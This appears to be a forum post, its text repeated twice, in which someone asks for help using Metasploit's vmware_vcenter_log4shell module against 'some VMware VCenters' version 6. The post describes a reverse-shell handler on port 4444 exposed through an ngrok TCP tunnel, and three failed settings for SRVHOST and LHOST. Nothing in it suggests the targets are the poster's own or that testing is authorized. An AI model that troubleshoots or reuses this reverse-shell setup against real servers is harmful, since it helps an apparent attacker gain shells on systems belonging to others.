Hey dudes, have someone used Metasploit with Ngrok tunnel?
Not sure if i'm doing right!
I'm trying to exploit some VMware VCenters version 6 using "multi/http/vmware_vcenter_log4shell"
In first terminal session I let metasploit running this config:
. exploit : multi/handler
. payload: generic/shell_reverse_tcp
. lhost 0.0.0.0
. lport: 4444
In a second terminal session I let Ngrok running in:
$ ngrok tcp 4444
Now i have this ngrok situation:
tcp://0.tcp.sa.ngrok.io:<random_port> -> localhost:4444
In third terminal session I have metasploit running "multi/http/vmware_vcenter_log4shell" in various configurations but always got error, my configs were:
1. SRVHOST:SRVPORT and LHOST:LPORT to ngrok_host:nrgrok_port
2. SRVHOST:SRVPORT to ngrok_host:nrgrok_port and LHOST:LPORT to 0.0.0.0:4444
3. SRVHOST:SRVPORT to 0.0.0.0:4444 and LHOST:LPORT to ngrok_host:nrgrok_port
Not sure if i'm doing right!
I'm trying to exploit some VMware VCenters version 6 using "multi/http/vmware_vcenter_log4shell"
In first terminal session I let metasploit running this config:
. exploit : multi/handler
. payload: generic/shell_reverse_tcp
. lhost 0.0.0.0
. lport: 4444
In a second terminal session I let Ngrok running in:
$ ngrok tcp 4444
Now i have this ngrok situation:
tcp://0.tcp.sa.ngrok.io:<random_port> -> localhost:4444
In third terminal session I have metasploit running "multi/http/vmware_vcenter_log4shell" in various configurations but always got error, my configs were:
1. SRVHOST:SRVPORT and LHOST:LPORT to ngrok_host:nrgrok_port
2. SRVHOST:SRVPORT to ngrok_host:nrgrok_port and LHOST:LPORT to 0.0.0.0:4444
3. SRVHOST:SRVPORT to 0.0.0.0:4444 and LHOST:LPORT to ngrok_host:nrgrok_port